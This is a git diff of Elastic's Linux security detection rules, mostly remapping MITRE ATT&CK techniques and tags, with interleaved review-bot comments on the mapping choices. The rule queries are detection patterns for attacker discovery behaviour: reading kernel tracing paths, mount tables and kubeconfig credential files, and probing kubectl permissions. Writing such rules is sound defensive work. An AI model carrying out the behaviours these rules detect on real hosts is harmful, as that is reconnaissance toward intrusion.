+++ b/rules/linux/defense_evasion_ssl_certificate_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2024/08/28" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -105,6 +105,16 @@ not ( [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1070" +name = "Indicator Removal" +reference = "https://attack.mitre.org/techniques/T1070/" + +[[rule.threat.technique.subtechnique]] +id = "T1070.004" +name = "File Deletion" +reference = "https://attack.mitre.org/techniques/T1070/004/" + [[rule.threat.technique]] id = "T1553" name = "Subvert Trust Controls" 
diff --git a/rules/linux/defense_evasion_sus_utility_executed_via_tmux_or_screen.toml b/rules/linux/defense_evasion_sus_utility_executed_via_tmux_or_screen.toml index efc5b4ccb61..215cc1c7e9e 100644 --- a/rules/linux/defense_evasion_sus_utility_executed_via_tmux_or_screen.toml +++ b/rules/linux/defense_evasion_sus_utility_executed_via_tmux_or_screen.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/04" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -84,9 +84,9 @@ process where host.os.type == "linux" and event.type == "start" and framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1202" -name = "Indirect Command Execution" -reference = "https://attack.mitre.org/techniques/T1202/" +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" [rule.threat.tactic] id = "TA0005" diff --git a/rules/linux/defense_evasion_suspicious_path_mounted.toml b/rules/linux/defense_evasion_suspicious_path_mounted.toml index b5156549894..33accceabc2 100644 --- a/rules/linux/defense_evasion_suspicious_path_mounted.toml +++ b/rules/linux/defense_evasion_suspicious_path_mounted.toml @@ -3,7 +3,7 @@ creation_date = "2025/04/25" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -114,11 +114,6 @@ id = "T1564" name = "Hide Artifacts" reference = "https://attack.mitre.org/techniques/T1564/" -[[rule.threat.technique.subtechnique]] -id = "T1564.001" -name = "Hidden Files and Directories" -reference = "https://attack.mitre.org/techniques/T1564/001/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" diff --git a/rules/linux/defense_evasion_symlink_binary_to_writable_dir.toml b/rules/linux/defense_evasion_symlink_binary_to_writable_dir.toml index daf5a725550..5f5aad743d2 100644 
--- a/rules/linux/defense_evasion_symlink_binary_to_writable_dir.toml +++ b/rules/linux/defense_evasion_symlink_binary_to_writable_dir.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/02" [rule] author = ["Elastic"] @@ -90,20 +90,26 @@ process.parent.args:(/usr/bin/qemu-aarch64-static or /usr/sbin/weak-modules or / [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1036" -name = "Masquerading" -reference = "https://attack.mitre.org/techniques/T1036/" + [rule.threat.tactic] + name = "Defense Evasion" + id = "TA0005" + reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat.technique.subtechnique]] -id = "T1036.003" -name = "Rename Legitimate Utilities" -reference = "https://attack.mitre.org/techniques/T1036/003/" + [[rule.threat.technique]] + name = "Hijack Execution Flow" + id = "T1574" + reference = "https://attack.mitre.org/techniques/T1574/" + + [[rule.threat.technique]] + name = "Indirect Command Execution" + id = "T1202" + reference = "https://attack.mitre.org/techniques/T1202/" + + [[rule.threat.technique]] + name = "Hide Artifacts" + id = "T1564" + reference = "https://attack.mitre.org/techniques/T1564/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" [rule.new_terms] field = "new_terms_fields" value = ["host.id", "process.parent.name"] diff --git a/rules/linux/defense_evasion_sysctl_kernel_feature_activity.toml b/rules/linux/defense_evasion_sysctl_kernel_feature_activity.toml index fd5e8cd4af8..b1e0758e17c 100644 --- a/rules/linux/defense_evasion_sysctl_kernel_feature_activity.toml +++ b/rules/linux/defense_evasion_sysctl_kernel_feature_activity.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/29" integration = ["endpoint", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] 
@@ -105,15 +105,25 @@ not ( [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +name = "Defense Evasion" +id = "TA0005" +reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat.technique]] -id = "T1562" name = "Impair Defenses" +id = "T1562" reference = "https://attack.mitre.org/techniques/T1562/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat.technique.subtechnique]] +name = "Indicator Blocking" +id = "T1562.006" +reference = "https://attack.mitre.org/techniques/T1562/006/" + +[[rule.threat.technique]] +name = "Subvert Trust Controls" +id = "T1553" +reference = "https://attack.mitre.org/techniques/T1553/" [[rule.threat]] framework = "MITRE ATT&CK" diff --git a/rules/linux/defense_evasion_unusual_preload_env_vars.toml b/rules/linux/defense_evasion_unusual_preload_env_vars.toml index bc08faf6393..fb5343a26bc 100644 --- a/rules/linux/defense_evasion_unusual_preload_env_vars.toml +++ b/rules/linux/defense_evasion_unusual_preload_env_vars.toml @@ -2,7 +2,7 @@ creation_date = "2024/12/16" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -57,7 +57,15 @@ After saving the integration change, the Elastic Agents running this policy will For more information on capturing environment variables refer to the [helper guide](https://www.elastic.co/guide/en/security/current/environment-variable-capture.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" query = ''' 
@@ -120,6 +128,25 @@ reference = "https://attack.mitre.org/techniques/T1574/006/" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + +[[rule.threat.technique.subtechnique]] +id = "T1574.006" +name = "Dynamic Linker Hijacking" +reference = "https://attack.mitre.org/techniques/T1574/006/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + [rule.new_terms] field = "new_terms_fields" value = ["process.env_vars"] diff --git a/rules/linux/defense_evasion_user_or_group_deletion.toml b/rules/linux/defense_evasion_user_or_group_deletion.toml index 40244d95a62..dcf6cbd1ec0 100644 --- a/rules/linux/defense_evasion_user_or_group_deletion.toml +++ b/rules/linux/defense_evasion_user_or_group_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/08" integration = ["system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/12" [rule] author = ["Elastic"] @@ -69,7 +69,13 @@ Filebeat is a lightweight shipper for forwarding and centralizing log data. Inst - To run the system module of Filebeat on Linux follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-system.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Impact", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' 
@@ -80,11 +86,11 @@ iam where host.os.type == "linux" and event.type in ("group", "user") and event. framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1531" -name = "Account Access Removal" -reference = "https://attack.mitre.org/techniques/T1531/" +id = "T1070" +name = "Indicator Removal" +reference = "https://attack.mitre.org/techniques/T1070/" [rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/defense_evasion_var_log_file_creation_by_unsual_process.toml b/rules/linux/defense_evasion_var_log_file_creation_by_unsual_process.toml index 1fe2cb6e7fb..533fff59b87 100644 --- a/rules/linux/defense_evasion_var_log_file_creation_by_unsual_process.toml +++ b/rules/linux/defense_evasion_var_log_file_creation_by_unsual_process.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/11" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -79,7 +79,18 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Data Source: SentinelOne", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" query = ''' 
@@ -97,10 +108,42 @@ id = "T1564" name = "Hide Artifacts" reference = "https://attack.mitre.org/techniques/T1564/" +[[rule.threat.technique.subtechnique]] +id = "T1564.001" +name = "Hidden Files and Directories" +reference = "https://attack.mitre.org/techniques/T1564/001/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + [rule.new_terms] field = "new_terms_fields" value = ["file.path", "process.executable"] diff --git a/rules/linux/discovery_dynamic_linker_via_od.toml b/rules/linux/discovery_dynamic_linker_via_od.toml index 41be32281ac..40420f501f9 100644 --- a/rules/linux/discovery_dynamic_linker_via_od.toml +++ b/rules/linux/discovery_dynamic_linker_via_od.toml @@ -2,7 +2,7 @@ creation_date = "2024/02/01" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -113,9 +113,9 @@ process where host.os.type == "linux" and event.type == "start" and event.action framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1083" -name = "File and Directory Discovery" -reference = "https://attack.mitre.org/techniques/T1083/" +id = "T1057" +name = "Process Discovery" +reference = "https://attack.mitre.org/techniques/T1057/" [rule.threat.tactic] id = "TA0007" 
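Review bot: The final `[[rule.threat]]` entry added at the end of the var_log hunk declares the Persistence tactic (`TA0003`) with no `[[rule.threat.technique]]`, unlike the Execution entry just above it and every other mapping in this patch; a tactic with no technique gives the new `"Tactic: Persistence"` tag from the preceding tags hunk nothing to justify it and no technique-level coverage to report. If a technique applies, add it under the entry; if none does, drop both the entry and the tag. The schema may well accept technique-less entries, so this is a coverage point rather than a load failure.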
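Review bot: Remapping the `discovery_dynamic_linker_via_od` rule from `T1083` "File and Directory Discovery" to `T1057` "Process Discovery" looks mismatched: the rule's name describes reading the dynamic linker, a file on disk, with `od`, which enumerates no processes. The kernel-reading rules later in this patch settled on `T1082` "System Information Discovery" for the same kind of host-introspection read, so `id = "T1082"` / `name = "System Information Discovery"` / `reference = "https://attack.mitre.org/techniques/T1082/"` would be consistent with them if T1083 is no longer wanted. The tactic block's remaining lines are outside this hunk.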
diff --git a/rules/linux/discovery_esxi_software_via_find.toml b/rules/linux/discovery_esxi_software_via_find.toml index 6d9fffd4a0c..a2e43bc8e59 100644 --- a/rules/linux/discovery_esxi_software_via_find.toml +++ b/rules/linux/discovery_esxi_software_via_find.toml @@ -2,7 +2,7 @@ creation_date = "2023/04/11" integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -113,11 +113,6 @@ not ?process.parent.executable == "/usr/lib/vmware/viewagent/bin/uninstall_viewa [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1083" -name = "File and Directory Discovery" -reference = "https://attack.mitre.org/techniques/T1083/" - [[rule.threat.technique]] id = "T1518" name = "Software Discovery" diff --git a/rules/linux/discovery_esxi_software_via_grep.toml b/rules/linux/discovery_esxi_software_via_grep.toml index bdacb1c0cb6..af3f9c6de0c 100644 --- a/rules/linux/discovery_esxi_software_via_grep.toml +++ b/rules/linux/discovery_esxi_software_via_grep.toml @@ -2,7 +2,7 @@ creation_date = "2023/04/11" integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -114,9 +114,9 @@ not ?process.parent.executable in ("/usr/share/qemu/init/qemu-kvm-init", "/etc/s framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1083" -name = "File and Directory Discovery" -reference = "https://attack.mitre.org/techniques/T1083/" +id = "T1518" +name = "Software Discovery" +reference = "https://attack.mitre.org/techniques/T1518/" [rule.threat.tactic] id = "TA0007" diff --git a/rules/linux/discovery_kernel_instrumentation_discovery_via_kprobes_and_tracefs.toml b/rules/linux/discovery_kernel_instrumentation_discovery_via_kprobes_and_tracefs.toml index 1168b4f3c91..401470b341b 100644 
--- a/rules/linux/discovery_kernel_instrumentation_discovery_via_kprobes_and_tracefs.toml +++ b/rules/linux/discovery_kernel_instrumentation_discovery_via_kprobes_and_tracefs.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/20" integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/20" [rule] author = ["Elastic"] @@ -56,7 +56,19 @@ This rule detects common Linux utilities and shells reading kprobes and tracing risk_score = 21 rule_id = "fb542346-1624-4cf2-bcc7-c68abaab261b" severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Discovery", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Auditd Manager", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Auditd Manager", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' 
@@ -76,11 +88,24 @@ process.args like ("/sys/kernel/debug/kprobes/*", "/sys/kernel/debug/tracing/*", framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1083" -name = "File and Directory Discovery" -reference = "https://attack.mitre.org/techniques/T1083/" +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1014" +name = "Rootkit" +reference = "https://attack.mitre.org/techniques/T1014/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/discovery_kernel_module_enumeration.toml b/rules/linux/discovery_kernel_module_enumeration.toml index 4bdbc4b9a63..e78a5b7070c 100644 --- a/rules/linux/discovery_kernel_module_enumeration.toml +++ b/rules/linux/discovery_kernel_module_enumeration.toml @@ -2,7 +2,7 @@ creation_date = "2020/04/23" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -122,14 +122,15 @@ not ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1518" -name = "Software Discovery" -reference = "https://attack.mitre.org/techniques/T1518/" +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + [rule.new_terms] field = "new_terms_fields" value = ["process.executable"] diff --git a/rules/linux/discovery_kernel_seeking.toml b/rules/linux/discovery_kernel_seeking.toml index 419aec12283..f7159bd2840 100644 --- a/rules/linux/discovery_kernel_seeking.toml +++ b/rules/linux/discovery_kernel_seeking.toml 
@@ -2,7 +2,7 @@ creation_date = "2025/01/07" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -79,7 +79,15 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Discovery", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -109,12 +117,20 @@ id = "T1082" name = "System Information Discovery" reference = "https://attack.mitre.org/techniques/T1082/" -[[rule.threat.technique]] -id = "T1083" -name = "File and Directory Discovery" -reference = "https://attack.mitre.org/techniques/T1083/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1014" +name = "Rootkit" +reference = "https://attack.mitre.org/techniques/T1014/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/discovery_kernel_unpacking.toml b/rules/linux/discovery_kernel_unpacking.toml index 216000df4dc..5fd3d44ce52 100644 --- a/rules/linux/discovery_kernel_unpacking.toml +++ b/rules/linux/discovery_kernel_unpacking.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/07" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] 
@@ -78,7 +78,15 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Discovery", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -107,12 +115,20 @@ id = "T1082" name = "System Information Discovery" reference = "https://attack.mitre.org/techniques/T1082/" -[[rule.threat.technique]] -id = "T1083" -name = "File and Directory Discovery" -reference = "https://attack.mitre.org/techniques/T1083/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1014" +name = "Rootkit" +reference = "https://attack.mitre.org/techniques/T1014/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/discovery_kubeconfig_file_discovery.toml b/rules/linux/discovery_kubeconfig_file_discovery.toml index 154c255d524..499b8b47ad0 100644 --- a/rules/linux/discovery_kubeconfig_file_discovery.toml +++ b/rules/linux/discovery_kubeconfig_file_discovery.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "cloud_defend"] maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2026/02/05" [rule] author = ["Elastic"] 
@@ -92,7 +92,17 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "low"
-tags = ["Domain: Endpoint", "Domain: Container", "Domain: Kubernetes", "OS: Linux", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Discovery", "Data Source: Elastic Defend", "Data Source: Elastic Defend for Containers", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "Domain: Container",
+ "Domain: Kubernetes",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Discovery",
+ "Data Source: Elastic Defend",
+ "Data Source: Elastic Defend for Containers",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "eql"
 query = '''
@@ -132,27 +142,9 @@ process where host.os.type == "linux" and event.type == "start" and event.action
 framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
-id = "T1552"
-name = "Unsecured Credentials"
-reference = "https://attack.mitre.org/techniques/T1552/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1552.001"
-name = "Credentials In Files"
-reference = "https://attack.mitre.org/techniques/T1552/001/"
-
-[rule.threat.tactic]
-id = "TA0006"
-name = "Credential Access"
-reference = "https://attack.mitre.org/tactics/TA0006/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1083"
-name = "File and Directory Discovery"
-reference = "https://attack.mitre.org/techniques/T1083/"
+id = "T1613"
+name = "Container and Resource Discovery"
+reference = "https://attack.mitre.org/techniques/T1613/"
 [rule.threat.tactic]
 id = "TA0007"
diff --git a/rules/linux/discovery_kubectl_permission_discovery.toml b/rules/linux/discovery_kubectl_permission_discovery.toml
index 321afa12afc..51b3731597f 100644
--- a/rules/linux/discovery_kubectl_permission_discovery.toml
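Review bot: The Credential Access mapping (T1552.001 Credentials In Files under TA0006) is removed from a rule that fires on access to kubeconfig files, and the tags hunk of the same file drops `Tactic: Credential Access` to match, so tags and threat stay consistent. A kubeconfig holds cluster credentials, which is why the previous dual Discovery/Credential Access mapping was defensible; if narrowing to T1613 Container and Resource Discovery alone is intentional, a sentence in the commit description would help analysts who pivot on the ATT&CK link. The `[[rule.threat]]` line that opens this block precedes the hunk.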
+++ b/rules/linux/discovery_kubectl_permission_discovery.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_ maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/03/23" +updated_date = "2026/02/05" [rule] author = ["Elastic"] @@ -119,9 +119,9 @@ process.name == "kubectl" and process.args == "auth" and process.args == "can-i" framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1069" -name = "Permission Groups Discovery" -reference = "https://attack.mitre.org/techniques/T1069/" +id = "T1613" +name = "Container and Resource Discovery" +reference = "https://attack.mitre.org/techniques/T1613/" [rule.threat.tactic] id = "TA0007" diff --git a/rules/linux/discovery_linux_hping_activity.toml b/rules/linux/discovery_linux_hping_activity.toml index c962146b215..13cafc9195f 100644 --- a/rules/linux/discovery_linux_hping_activity.toml +++ b/rules/linux/discovery_linux_hping_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -128,13 +128,14 @@ process where host.os.type == "linux" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1046" -name = "Network Service Discovery" -reference = "https://attack.mitre.org/techniques/T1046/" +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + diff --git a/rules/linux/discovery_linux_nping_activity.toml b/rules/linux/discovery_linux_nping_activity.toml index efbbef38924..0e020284684 100644 --- a/rules/linux/discovery_linux_nping_activity.toml 
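Review bot: In the hping threat hunk the new side removes the blank line after `framework = "MITRE ATT&CK"` (the lone `-`) and appends an empty line at end of file (the trailing `+`), which differs from how every other rule file in this chunk lays out its threat blocks; the same pattern recurs in the nping, sudo_allowed_command_enumeration, suspicious_which_command_execution and cupsd_foomatic_rip_shell_execution hunks. Blank context lines are invisible in this collapsed view, so the exact spacing is inferred from the markers and the hunk counts, but the trailing EOF blank is unambiguous. Separately, swapping T1046 Network Service Discovery for T1082 System Information Discovery is surprising for hping, a packet-crafting tool used to probe hosts and ports; if the goal is to converge the `discovery_*` rules on one technique, a one-line rationale in the description would avoid the question being re-raised.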
+++ b/rules/linux/discovery_linux_nping_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -128,18 +128,14 @@ process where host.os.type == "linux" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1018" -name = "Remote System Discovery" -reference = "https://attack.mitre.org/techniques/T1018/" - [[rule.threat.technique]] id = "T1046" name = "Network Service Discovery" reference = "https://attack.mitre.org/techniques/T1046/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + diff --git a/rules/linux/discovery_manual_mount_discovery_via_exports_or_fstab.toml b/rules/linux/discovery_manual_mount_discovery_via_exports_or_fstab.toml index 4489c16b91c..221cc4ff072 100644 --- a/rules/linux/discovery_manual_mount_discovery_via_exports_or_fstab.toml +++ b/rules/linux/discovery_manual_mount_discovery_via_exports_or_fstab.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/25" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -112,9 +112,9 @@ process.command_line like ("/etc/exports", "/etc/fstab") framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1135" -name = "Network Share Discovery" -reference = "https://attack.mitre.org/techniques/T1135/" +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" [rule.threat.tactic] id = "TA0007" diff --git a/rules/linux/discovery_pam_version_discovery.toml b/rules/linux/discovery_pam_version_discovery.toml index b850ea0830e..fd9295a70a0 100644 --- a/rules/linux/discovery_pam_version_discovery.toml 
+++ b/rules/linux/discovery_pam_version_discovery.toml @@ -2,7 +2,7 @@ creation_date = "2024/12/16" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -86,7 +86,19 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Discovery", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Tactic: Persistence", + "Tactic: Credential Access", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' 
